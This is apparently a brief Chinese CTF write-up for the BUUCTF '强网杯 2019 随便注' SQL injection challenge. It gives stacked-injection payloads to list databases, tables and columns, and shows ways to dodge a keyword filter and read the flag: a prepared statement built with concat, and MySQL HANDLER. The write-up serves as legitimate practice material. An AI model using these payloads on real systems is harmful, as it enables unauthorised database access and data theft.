9.2 BUUCTF [强网杯 2019]随便注

终于碰到一道 sqlmap不能用的sql注入题了

sqlmap只能爆出一个supersqli表 所以只能手动注入
这题 ban了 select where update ...
所以用堆叠注入

?inject=1' ; show databases; -- -

?inject=1' ; show tables; -- -

?inject=1' ; show columns from `1919810931114514`

注意 如果表名是数字一定要用 ``框起来

接下来就要提取 flag 只是 select都被ban了 ...

新姿势： 预编译

?inject=1' ;prepare hack from concat("s","elect flag from `1919810931114514`");execute hack;

类似 C++的define感觉 同时用concat绕过

还可以用 handler
payload:

?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first;handler `1919810931114514` close;#